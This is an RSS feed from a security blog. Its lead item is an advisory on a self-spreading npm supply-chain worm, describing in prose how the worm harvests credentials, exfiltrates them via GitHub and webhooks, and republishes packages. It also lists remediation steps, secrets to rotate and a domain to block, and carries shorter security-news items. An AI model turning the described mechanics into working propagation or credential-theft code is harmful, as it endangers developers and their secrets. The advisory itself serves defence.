<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Ervik.as</title>
	<atom:link href="https://www.ervik.as/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.ervik.as</link>
	<description>Cloud, Cyber Security, EUC, DaaS and HCI</description>
	<lastBuildDate>Wed, 17 Sep 2025 13:57:16 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	

<image>
	<url>https://www.ervik.as/wp-content/uploads/2020/10/cropped-ervik-as-512-32x32.png</url>
	<title>Ervik.as</title>
	<link>https://www.ervik.as</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Wormable Malware Causing Supply Chain Compromise of npm Code Packages</title>
		<link>https://www.ervik.as/wormable-malware-causing-supply-chain-compromise-of-npm-code-packages/</link>
		
		<dc:creator><![CDATA[Alexander Ervik Johnsen]]></dc:creator>
		<pubDate>Wed, 17 Sep 2025 13:57:00 +0000</pubDate>
				<category><![CDATA[Arctic Wolf]]></category>
		<category><![CDATA[Cyber Security]]></category>
		<category><![CDATA[SOC]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[MDR]]></category>
		<category><![CDATA[soc]]></category>
		<guid isPermaLink="false">https://www.ervik.as/?p=40094</guid>

					<description><![CDATA[On September 15, 2025, reports surfaced that the widely used npm package @ctrl/tinycolor&#160;had been compromised by malware as part of a broader supply chain attack affecting over 180 packages. Reports surfaced that the widely used npm package @ctrl/tinycolor had been compromised by Wormable Malware as part of a broader supply chain attack affecting over 40 packages initially, with [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fwww.ervik.as%2Fwormable-malware-causing-supply-chain-compromise-of-npm-code-packages%2F&amp;linkname=Wormable%20Malware%20Causing%20Supply%20Chain%20Compromise%20of%20npm%20Code%20Packages" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_bluesky" href="https://www.addtoany.com/add_to/bluesky?linkurl=https%3A%2F%2Fwww.ervik.as%2Fwormable-malware-causing-supply-chain-compromise-of-npm-code-packages%2F&amp;linkname=Wormable%20Malware%20Causing%20Supply%20Chain%20Compromise%20of%20npm%20Code%20Packages" title="Bluesky" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fwww.ervik.as%2Fwormable-malware-causing-supply-chain-compromise-of-npm-code-packages%2F&amp;linkname=Wormable%20Malware%20Causing%20Supply%20Chain%20Compromise%20of%20npm%20Code%20Packages" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Fwww.ervik.as%2Fwormable-malware-causing-supply-chain-compromise-of-npm-code-packages%2F&amp;linkname=Wormable%20Malware%20Causing%20Supply%20Chain%20Compromise%20of%20npm%20Code%20Packages" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fwww.ervik.as%2Fwormable-malware-causing-supply-chain-compromise-of-npm-code-packages%2F&amp;linkname=Wormable%20Malware%20Causing%20Supply%20Chain%20Compromise%20of%20npm%20Code%20Packages" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fwww.ervik.as%2Fwormable-malware-causing-supply-chain-compromise-of-npm-code-packages%2F&amp;linkname=Wormable%20Malware%20Causing%20Supply%20Chain%20Compromise%20of%20npm%20Code%20Packages" title="Email" rel="nofollow noopener" target="_blank"></a></p>
<figure class="wp-block-image size-large is-resized"><img data-tf-not-load="1" fetchpriority="high" loading="auto" decoding="auto" fetchpriority="high" decoding="async" width="1024" height="1024" src="http://www.ervik.as/wp-content/uploads/2024/12/Gemini_Generated_Image_t18k7ut18k7ut18k-1024x1024.jpeg" alt="Wormable Malware Causing Supply Chain Compromise of npm Code Packages" class="wp-image-33709" style="width:586px;height:auto" srcset="https://www.ervik.as/wp-content/uploads/2024/12/Gemini_Generated_Image_t18k7ut18k7ut18k-1024x1024.jpeg 1024w, https://www.ervik.as/wp-content/uploads/2024/12/Gemini_Generated_Image_t18k7ut18k7ut18k-300x300.jpeg 300w, https://www.ervik.as/wp-content/uploads/2024/12/Gemini_Generated_Image_t18k7ut18k7ut18k-150x150.jpeg 150w, https://www.ervik.as/wp-content/uploads/2024/12/Gemini_Generated_Image_t18k7ut18k7ut18k-768x768.jpeg 768w, https://www.ervik.as/wp-content/uploads/2024/12/Gemini_Generated_Image_t18k7ut18k7ut18k-1536x1536.jpeg 1536w, https://www.ervik.as/wp-content/uploads/2024/12/Gemini_Generated_Image_t18k7ut18k7ut18k-1024x1024-50x50.jpeg 50w, https://www.ervik.as/wp-content/uploads/2024/12/Gemini_Generated_Image_t18k7ut18k7ut18k.jpeg 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>On September 15, 2025, reports surfaced that the widely used npm package @ctrl/tinycolor&nbsp;had been compromised by malware as part of a broader supply chain attack affecting over 180 packages.</p>



<p><a class="dracula-style-link dracula-style-txt-border dracula-processed" data-dracula_alpha_bg="rgba(0, 0, 0, 0)" data-dracula_preserved_classes="dracula-style-txt-border dracula-style-link dracula-processed" href="https://github.com/scttcper/tinycolor/issues/256" target="_blank" rel="noopener">Reports</a> surfaced that the widely used npm package @ctrl/tinycolor had been compromised by Wormable Malware as part of a broader supply chain attack affecting over 40 packages initially, with the number rising to more than 180 according to Aikido’s <a class="dracula-style-txt-border dracula-style-link dracula-processed" data-dracula_alpha_bg="rgba(0, 0, 0, 0)" href="https://www.aikido.dev/blog/s1ngularity-nx-attackers-strike-again" target="_blank" rel="noopener">blog</a>. Upon further investigation, the first malicious package that was identified as compromised in this campaign was rxnt-authentication, which was updated on September 14, 2025, at 17:58:50 UTC. </p>



<p>The malware in this campaign is considered one of the first self-spreading worms to propagate via the npm ecosystem. It harvests sensitive information such as developer credentials, cloud keys, and tokens by scanning infected systems using credential gathering tools such as <a class="dracula-style-link dracula-style-txt-border dracula-processed" data-dracula_alpha_bg="rgba(0, 0, 0, 0)" data-dracula_preserved_classes="dracula-style-txt-border dracula-style-link dracula-processed" href="https://trufflesecurity.com/trufflehog" target="_blank" rel="noopener">TruffleHog</a>, exfiltrating the stolen data through public GitHub repositories, and injecting itself into other packages managed by compromised developers, to spread further across the npm ecosystem. <br><a href="https://www.ervik.as/cyber-security-news/">Updated Cyber Security News can be found here.</a></p>



<p>Package management ecosystems like npm have been heavily targeted by threat actors recently and will likely continue to be a prime focus for organizations using these tools as part of their development toolchain. The most recent developments follow the September 8, 2025&nbsp;<a href="https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised" target="_blank" rel="noopener">npm package compromise</a>, in which malicious updates injected cryptocurrency-stealing malware into popular packages, and the August 26, 2025&nbsp;<a href="https://nx.dev/blog/s1ngularity-postmortem" target="_blank" rel="noopener">Nx package compromise</a>, which exfiltrated thousands of developer credentials and led to many private repositories being made public.&nbsp;</p>



<h3 class="wp-block-heading">Malware&nbsp;</h3>



<p>From a high level, the Wormable Malware in this campaign carries out a series of actions to steal data and then proceeds to spread itself widely within the npm ecosystem. </p>



<ol class="wp-block-list">
<li>First, it scans infected hosts and continuous integration (CI) environments for sensitive secrets like passwords and cloud service credentials by using tools like TruffleHog and querying metadata endpoints from AWS, Google Cloud, and Azure.</li>



<li>It then creates a public GitHub repository named “Shai-Hulud,” where it dumps a JSON file containing system details, environment variables, and stolen secrets for threat actors to access. </li>



<li>The malware also drops a malicious GitHub Actions workflow (.github/workflows/shai-hulud-workflow.yml) that collects repository secrets and sends them to attacker-controlled webhooks. </li>



<li>To propagate further, it looks for valid npm tokens it finds and uses them to automatically republish other packages maintained by the compromised user with malicious code. </li>



<li>Finally, it makes private repositories accessible by turning them public or adding workflows and branches that trigger additional leaks and malware runs, effectively acting as a self-replicating worm across the developer ecosystem. </li>
</ol>



<h3 class="wp-block-heading">Affected Code Packages</h3>



<p>The npm software registry is the world’s largest package repository, containing more than 800,000 code packages with millions of downloads per day. As it is widely used in development environments, organizations that use npm as part of their development workflow are recommended to review this&nbsp;<a href="https://www.aikido.dev/blog/s1ngularity-nx-attackers-strike-again" target="_blank" rel="noreferrer noopener">blog article</a>&nbsp;for a list of affected packages that have been identified so far.&nbsp;</p>



<h3 class="wp-block-heading">Recommendations&nbsp;</h3>



<h3 class="wp-block-heading">Review GitHub Accounts for Malicious Repositories</h3>



<p>Considering that this malware is known to change private repositories to public, review your GitHub account for suspicious activities involving the unintended change of private repositories to be public-facing.&nbsp;</p>



<p>Additionally, look for new repositories with a description of&nbsp;Shai-Hulud&nbsp;Migration&nbsp;or newly-created branches called&nbsp;Shai-Hulud. If you are not using GitHub in your environment but do publish packages to a public or private npm registry, look for new, unsanctioned versions of packages deployed to npm registries.&nbsp;</p>



<h3 class="wp-block-heading">Identify and Remove Affected npm Packages</h3>



<p>Hijacked npm packages that were identified by their maintainers are being removed from the npm registry to prevent further distribution. It is recommended that organizations review and remove affected versions of npm packages from their environments, especially on devices where npm is used as part of the development pipeline.&nbsp;</p>



<p>Special care should be taken in any confirmed infection scenario where npm authentication tokens are present for publication of packages to private or public npm registries, considering that this malware attempts to propagate by deploying trojanized versions of packages using those credentials. Where feasible, consider purging and reinstalling all npm packages to ensure no known trojanized dependencies are able to persist.&nbsp;</p>



<h3 class="wp-block-heading">Rotate Secrets on Devices Running Trojanized npm Packages</h3>



<p>At minimum, any device confirmed to be running trojanized versions of npm packages should be quarantined until fully remediated, and any accessible secrets should be rotated. As a precaution, teams may consider rotating these credentials across development environments where npm packages are regularly installed, even without confirmed compromise.&nbsp;</p>



<p>Considering that this malware/ Wormable Malware harvests credentials from a wide variety of sources using tools like TruffleHog, various types of secrets should be considered for rotation, which may include those gathered in the recent campaign. </p>



<p>Potentially affected secrets include, but are not necessarily limited to:&nbsp;</p>



<ul class="wp-block-list">
<li>AWS credentials, including access keys (e.g., AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY), IAM credentials, and session tokens. </li>



<li>Google Cloud Platform service credentials including OAuth tokens and service account keys. </li>



<li>Azure credentials including service principals and access tokens. </li>



<li>Credentials stored in credential management tools such as AWS Secrets Manager, GCP Secret Manager, and Azure Key Vault. </li>



<li>NPM authentication tokens (i.e., those used for automation and publication). </li>



<li>API keys stored in environment variables throughout code. </li>



<li>SSH keys used with Git. </li>



<li>Database credentials stored in connection strings. </li>



<li>GitHub personal access tokens. </li>



<li>GitHub Actions secrets. </li>
</ul>



<p><strong>Note</strong><strong>:&nbsp;</strong>At the time of this writing, TruffleHog supports over 800 different types of credentials for extraction. While there is no central documentation page listing out all supported credential types, their GitHub repository has a list of&nbsp;<a href="https://github.com/trufflesecurity/trufflehog/tree/main/pkg/detectors" target="_blank" rel="noopener">detectors</a>&nbsp;provided.&nbsp;</p>



<h3 class="wp-block-heading">Monitor for Suspicious Connections</h3>



<p>In this campaign, threat actors were observed creating outbound connections to the&nbsp;webhook[.]site&nbsp;as a means of&nbsp;<a href="https://www.stepsecurity.io/blog/ctrl-tinycolor-and-40-npm-packages-compromised#propagation-mechanics" target="_blank" rel="noreferrer noopener">confirming that propagation was successful</a>. If you do not use this service for legitimate purposes in your environment, consider blocking this domain.&nbsp;</p>



<h4 class="wp-block-heading">References</h4>



<ul class="wp-block-list">
<li><a href="https://www.stepsecurity.io/blog/ctrl-tinycolor-and-40-npm-packages-compromised" target="_blank" rel="noreferrer noopener">Step Security Research Blog</a></li>



<li><a href="https://socket.dev/blog/tinycolor-supply-chain-attack-affects-40-packages" target="_blank" rel="noreferrer noopener">Socket Research Blog</a></li>



<li><a href="https://www.aikido.dev/blog/s1ngularity-nx-attackers-strike-again" target="_blank" rel="noreferrer noopener">Aikido Research Blog</a></li>
</ul>



<h4 class="wp-block-heading">Resources</h4>



<p><em>Understand the threat landscape with our annual review highlighting cyber threats with the&nbsp;<a href="https://arcticwolf.com/resources/report/2025-security-operations-report/" target="_blank" rel="noopener">2025 Security Operations Report</a>.&nbsp;</em></p>



<p><em>See how&nbsp;<a href="https://arcticwolf.com/labs/" target="_blank" rel="noopener">Arctic Wolf utilizes threat intelligenc</a>e to harden your attack surface and stop threats earlier and faster.</em></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Arctic Wolf Observes organizations receiving unsolicited Microsoft MFA</title>
		<link>https://www.ervik.as/arctic-wolf-observes-organizations-receiving-unsolicited-microsoft-mfa/</link>
		
		<dc:creator><![CDATA[Alexander Ervik Johnsen]]></dc:creator>
		<pubDate>Thu, 12 Jun 2025 19:51:39 +0000</pubDate>
				<category><![CDATA[Arctic Wolf]]></category>
		<category><![CDATA[Cyber Security]]></category>
		<category><![CDATA[Cyber Security News]]></category>
		<category><![CDATA[MFA]]></category>
		<category><![CDATA[Microsoft MFA]]></category>
		<category><![CDATA[Security Bulletin]]></category>
		<guid isPermaLink="false">https://www.ervik.as/?p=39096</guid>

					<description><![CDATA[Arctic Wolf has recently observed customers receiving unsolicited Microsoft MFA (multi-factor authentication) text messages. Arctic Wolf has recently observed customers receiving unsolicited Microsoft MFA (multi-factor authentication) text messages. These messages originate from legitimate Microsoft short code numbers; however, the source and intent have not been confirmed. This issue appears widespread, affecting organizations across multiple industry [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-observes-organizations-receiving-unsolicited-microsoft-mfa%2F&amp;linkname=Arctic%20Wolf%20Observes%20organizations%20receiving%20unsolicited%20Microsoft%20MFA" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_bluesky" href="https://www.addtoany.com/add_to/bluesky?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-observes-organizations-receiving-unsolicited-microsoft-mfa%2F&amp;linkname=Arctic%20Wolf%20Observes%20organizations%20receiving%20unsolicited%20Microsoft%20MFA" title="Bluesky" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-observes-organizations-receiving-unsolicited-microsoft-mfa%2F&amp;linkname=Arctic%20Wolf%20Observes%20organizations%20receiving%20unsolicited%20Microsoft%20MFA" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-observes-organizations-receiving-unsolicited-microsoft-mfa%2F&amp;linkname=Arctic%20Wolf%20Observes%20organizations%20receiving%20unsolicited%20Microsoft%20MFA" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-observes-organizations-receiving-unsolicited-microsoft-mfa%2F&amp;linkname=Arctic%20Wolf%20Observes%20organizations%20receiving%20unsolicited%20Microsoft%20MFA" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-observes-organizations-receiving-unsolicited-microsoft-mfa%2F&amp;linkname=Arctic%20Wolf%20Observes%20organizations%20receiving%20unsolicited%20Microsoft%20MFA" title="Email" rel="nofollow noopener" target="_blank"></a></p>
<figure class="wp-block-image size-large is-resized"><img data-tf-not-load="1" decoding="async" width="1024" height="1024" src="http://www.ervik.as/wp-content/uploads/2024/12/Gemini_Generated_Image_t18k7ut18k7ut18k-1024x1024.jpeg" alt="Arctic Wolf Observes Organizations Receiving Unsolicited Microsoft MFA Messages" class="wp-image-33709" style="width:418px;height:auto" srcset="https://www.ervik.as/wp-content/uploads/2024/12/Gemini_Generated_Image_t18k7ut18k7ut18k-1024x1024.jpeg 1024w, https://www.ervik.as/wp-content/uploads/2024/12/Gemini_Generated_Image_t18k7ut18k7ut18k-300x300.jpeg 300w, https://www.ervik.as/wp-content/uploads/2024/12/Gemini_Generated_Image_t18k7ut18k7ut18k-150x150.jpeg 150w, https://www.ervik.as/wp-content/uploads/2024/12/Gemini_Generated_Image_t18k7ut18k7ut18k-768x768.jpeg 768w, https://www.ervik.as/wp-content/uploads/2024/12/Gemini_Generated_Image_t18k7ut18k7ut18k-1536x1536.jpeg 1536w, https://www.ervik.as/wp-content/uploads/2024/12/Gemini_Generated_Image_t18k7ut18k7ut18k-1024x1024-50x50.jpeg 50w, https://www.ervik.as/wp-content/uploads/2024/12/Gemini_Generated_Image_t18k7ut18k7ut18k.jpeg 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>Arctic Wolf has recently observed customers receiving unsolicited Microsoft MFA (multi-factor authentication) text messages.</p>



<p>Arctic Wolf has recently observed customers receiving unsolicited Microsoft MFA (multi-factor authentication) text messages. These messages originate from legitimate Microsoft short code numbers; however, the source and intent have not been confirmed. This issue appears widespread, affecting organizations across multiple industry verticals.  </p>



<figure class="wp-block-image aligncenter"><a href="https://arcticwolf.com/wp-content/uploads/2025/06/test-message-example-1024x644.jpg" target="_blank" rel="noopener"><img loading="lazy" width="1024" height="644" decoding="async" src="https://arcticwolf.com/wp-content/uploads/2025/06/test-message-example-1024x644.jpg" alt="" class="wp-image-125954"/></a></figure>



<p><em>Example of Text Message</em></p>



<p>It is currently unclear whether this activity is due to a systemic issue on Microsoft’s side or part of a malicious campaign. At this time, <a href="https://www.ervik.as/soc/arctic-wolf/">Arctic Wolf</a> has not identified any malicious activity or unauthorized access associated with these unexpected Microsoft MFA prompts. </p>



<h2 class="wp-block-heading">Recommendation&nbsp;</h2>



<h3 class="wp-block-heading">Avoid Interacting With Unsolicited Microsoft MFA or other MFA Authentication Messages</h3>



<p>Avoid interacting with any unsolicited MFA requests and report them to your security team.&nbsp;</p>



<p><strong>Resources</strong></p>



<p><em><a href="https://arcticwolf.com/resource/aw/arctic-wolf-threat-report-2025?lb-mode=overlay" target="_blank" rel="noopener">Understand the threat landscape, and how to better defend your organization, with the 2025 Arctic Wolf Threat Report</a></em></p>



<p><em><a href="https://arcticwolf.com/resource/aw/arctic-wolf-threat-intelligence-datasheet" target="_blank" rel="noopener">See how Arctic Wolf utilizes threat intelligence to harden your attack surface and stop threats earlier and faster</a></em></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Arctic Wolf Incident Response: threat actor negotiation</title>
		<link>https://www.ervik.as/arctic-wolf-incident-response-threat-actor-negotiation/</link>
		
		<dc:creator><![CDATA[Alexander Ervik Johnsen]]></dc:creator>
		<pubDate>Thu, 12 Jun 2025 19:45:34 +0000</pubDate>
				<category><![CDATA[Arctic Wolf]]></category>
		<category><![CDATA[Cyber Security]]></category>
		<category><![CDATA[SOC]]></category>
		<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[IR]]></category>
		<category><![CDATA[soc]]></category>
		<category><![CDATA[threat actor negotiation]]></category>
		<guid isPermaLink="false">https://www.ervik.as/?p=39090</guid>

					<description><![CDATA[Explore how our multi-faceted team of experienced technical investigators handles every part of the IR process, from digital forensics to threat actor negotiation.]]></description>
										<content:encoded><![CDATA[<p><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-incident-response-threat-actor-negotiation%2F&amp;linkname=Arctic%20Wolf%20Incident%20Response%3A%20threat%20actor%20negotiation" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_bluesky" href="https://www.addtoany.com/add_to/bluesky?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-incident-response-threat-actor-negotiation%2F&amp;linkname=Arctic%20Wolf%20Incident%20Response%3A%20threat%20actor%20negotiation" title="Bluesky" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-incident-response-threat-actor-negotiation%2F&amp;linkname=Arctic%20Wolf%20Incident%20Response%3A%20threat%20actor%20negotiation" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-incident-response-threat-actor-negotiation%2F&amp;linkname=Arctic%20Wolf%20Incident%20Response%3A%20threat%20actor%20negotiation" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-incident-response-threat-actor-negotiation%2F&amp;linkname=Arctic%20Wolf%20Incident%20Response%3A%20threat%20actor%20negotiation" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-incident-response-threat-actor-negotiation%2F&amp;linkname=Arctic%20Wolf%20Incident%20Response%3A%20threat%20actor%20negotiation" title="Email" rel="nofollow noopener" target="_blank"></a></p>
<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" width="576" height="225" src="http://www.ervik.as/wp-content/uploads/2024/05/ArcticWolf-logo2.png" alt="Arctic Wolf Incident Response: threat actor negotiation" class="wp-image-25623" style="width:204px;height:auto" srcset="https://www.ervik.as/wp-content/uploads/2024/05/ArcticWolf-logo2.png 576w, https://www.ervik.as/wp-content/uploads/2024/05/ArcticWolf-logo2-300x117.png 300w" sizes="(max-width: 576px) 100vw, 576px" /></figure>



<p>Explore how our multi-faceted team of experienced technical investigators handles every part of the IR process, from digital forensics to threat actor negotiation.</p>



<figure class="wp-block-embed is-type-video is-provider-vimeo wp-block-embed-vimeo wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">
<div class="post-video"><iframe loading="lazy" title="Arctic Wolf® Incident Response: Experienced Technical Investigators" src="https://player.vimeo.com/video/1053511156?dnt=1&amp;app_id=122963" width="1165" height="655" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share"></iframe></div>
</div></figure>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title> Arctic Wolf 2025 Threat Report</title>
		<link>https://www.ervik.as/arctic-wolf-2025-threat-report/</link>
		
		<dc:creator><![CDATA[Alexander Ervik Johnsen]]></dc:creator>
		<pubDate>Mon, 03 Mar 2025 11:26:22 +0000</pubDate>
				<category><![CDATA[Arctic Wolf]]></category>
		<category><![CDATA[Cyber Security]]></category>
		<category><![CDATA[Cyber Security News]]></category>
		<category><![CDATA[Arctic Wolf Labs]]></category>
		<category><![CDATA[Cyber Risk]]></category>
		<category><![CDATA[Cyber Threats]]></category>
		<category><![CDATA[Threat Report]]></category>
		<guid isPermaLink="false">https://www.ervik.as/?p=36115</guid>

					<description><![CDATA[Arctic Wolf 2025 Threat Report : 96 Percent of Ransomware Cases Included Data Theft as Cybercriminals Double Down on Extortion Arctic Wolf, a global leader in security operations, today released its annual Arctic Wolf 2025 Threat Report, offering an in-depth analysis of the evolving cyber threat landscape. This year’s findings underscore how cybercriminals are adapting their [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-2025-threat-report%2F&amp;linkname=%C2%A0Arctic%20Wolf%202025%20Threat%20Report" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_bluesky" href="https://www.addtoany.com/add_to/bluesky?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-2025-threat-report%2F&amp;linkname=%C2%A0Arctic%20Wolf%202025%20Threat%20Report" title="Bluesky" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-2025-threat-report%2F&amp;linkname=%C2%A0Arctic%20Wolf%202025%20Threat%20Report" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-2025-threat-report%2F&amp;linkname=%C2%A0Arctic%20Wolf%202025%20Threat%20Report" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-2025-threat-report%2F&amp;linkname=%C2%A0Arctic%20Wolf%202025%20Threat%20Report" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-2025-threat-report%2F&amp;linkname=%C2%A0Arctic%20Wolf%202025%20Threat%20Report" title="Email" rel="nofollow noopener" target="_blank"></a></p>
<figure class="wp-block-image size-large is-resized"><img loading="lazy" width="1155" height="1363" decoding="async" src="https://cybersecurity.arcticwolf.com/rs/840-OSQ-661/images/2025-Threat-Report_3-page-layout-mock.png" alt="Arctic Wolf 2025 Threat Report" style="width:297px;height:auto"/></figure>



<h2 class="wp-block-heading">Arctic Wolf 2025 Threat Report : 96 Percent of Ransomware Cases Included Data Theft as Cybercriminals Double Down on Extortion</h2>



<p>Arctic Wolf, a global leader in security operations, today released its annual <a href="https://cybersecurity.arcticwolf.com/2025-Threat-Report-v1.html" target="_blank" rel="noopener">Arctic Wolf 2025 Threat Report</a>, offering an in-depth analysis of the evolving cyber threat landscape. This year’s findings underscore how cybercriminals are adapting their methods to bypass stronger security defenses—prioritizing data theft, refining business email compromise (BEC) scams, and exploiting known vulnerabilities to infiltrate organizations worldwide.</p>



<p>New research reveals evolving threat tactics, the rising role of business email compromise, and the importance of proactive security measures. This extensive report takes a deep dive into the types of cyber attacks Arctic Wolf® Incident Response investigated this year, why certain industries are targeted with certain kinds of tactics, techniques, and procedures (TTPs), and what organizations around the globe can do to harden their defenses in this changing threat landscape.<br></p>



<p>Leveraging insights from <a href="https://www.ervik.as/soc/arctic-wolf/">Arctic Wolf’s</a> incident response (IR) engagements, threat intelligence research, and telemetry from the Arctic Wolf Aurora Platform, the report provides a detailed examination of the tactics, techniques, and procedures (TTPs) attackers are using to outmaneuver traditional defenses. It also offers actionable recommendations for organizations looking to enhance their cybersecurity resilience, taking advantage of the report’s description of the current threat landscape.</p>



<p>“The 2025 Arctic Wolf Threat Report highlights a critical shift in cybercriminal behavior: data exfiltration has become the norm, not the exception,” said Kerri Shafer-Page, vice president of incident response, Arctic Wolf. “Threat actors are no longer just locking up data with ransomware; they’re stealing it first to maximize pressure on victims. The insights help organizations understand the risks they face today and shape the advanced detection and response strategies embedded within the Arctic Wolf Aurora Platform to keep our customers secure.”</p>



<p><strong>Key findings from the Arctic Wolf 2025 Threat Report include:</strong></p>



<ul class="wp-block-list">
<li><strong>Steal first, extort second.</strong> As organizations improve their ability to recover from ransomware, cybercriminals have turned to data exfiltration to increase leverage—96% of ransomware cases analyzed included data theft.</li>



<li><strong>The cybercrime trifecta</strong>. Three types of cybersecurity incidents account for 95% of all incident response (IR) cases: ransomware 44%, business email compromise (BEC) 27%, and intrusions 24%.</li>



<li><strong>Threat actors follow the money.</strong> BEC continues to grow as a preferred tactic, particularly in the finance and insurance sector, where it accounted for 53% of IR cases—making it the only industry where BEC outpaced ransomware.</li>



<li><strong>Patch or pay.</strong> In 76% of intrusion cases, attackers exploited just 10 specific vulnerabilities—none of which were zero-days, and most linked to remote access tools and externally facing services. This reinforces the need for proactive patch management.</li>



<li><strong>Ransomware’s price tag: $600K.</strong> Median ransom demands remain high at $600,000 USD, demonstrating that ransomware remains a lucrative business for cybercriminals despite increased law enforcement action.</li>



<li><strong>Never split the difference.</strong> The Arctic Wolf Incident Response Team helped reduce aggregate ransom demands by 64%, and 70% of clients using Arctic Wolf’s negotiation services avoided paying ransoms altogether.</li>
</ul>



<p>The Arctic Wolf 2025 Threat Report brings together Arctic Wolf’s top security minds—from incident responders and researchers to data scientists and engineers—to provide a comprehensive analysis of today’s evolving cyber threat landscape. This essential resource helps security, IT, and business leaders anticipate threats, strengthen defenses, and stay ahead of adversaries. Powered by insights from the Arctic Wolf Aurora Platform and backed by security operations expertise from one of the world’s largest commercial Security Operations Centers (SOCs), Arctic Wolf delivers the intelligence and defense organizations need to proactively detect, respond to, and remediate cyber threats.</p>



<p>For additional insights and to download the full <a href="https://cybersecurity.arcticwolf.com/2025-Threat-Report-v1.html" target="_blank" rel="noopener">Arctic Wolf 2025 Threat Report</a>, visit <a href="https://arcticwolf.com/" target="_blank" rel="noopener">arcticwolf.com</a>.</p>



<p></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Citrix announces acquisition of Unicon</title>
		<link>https://www.ervik.as/citrix-announces-acquisition-of-unicon/</link>
		
		<dc:creator><![CDATA[Alexander Ervik Johnsen]]></dc:creator>
		<pubDate>Thu, 23 Jan 2025 08:07:12 +0000</pubDate>
				<category><![CDATA[Citrix]]></category>
		<category><![CDATA[DaaS]]></category>
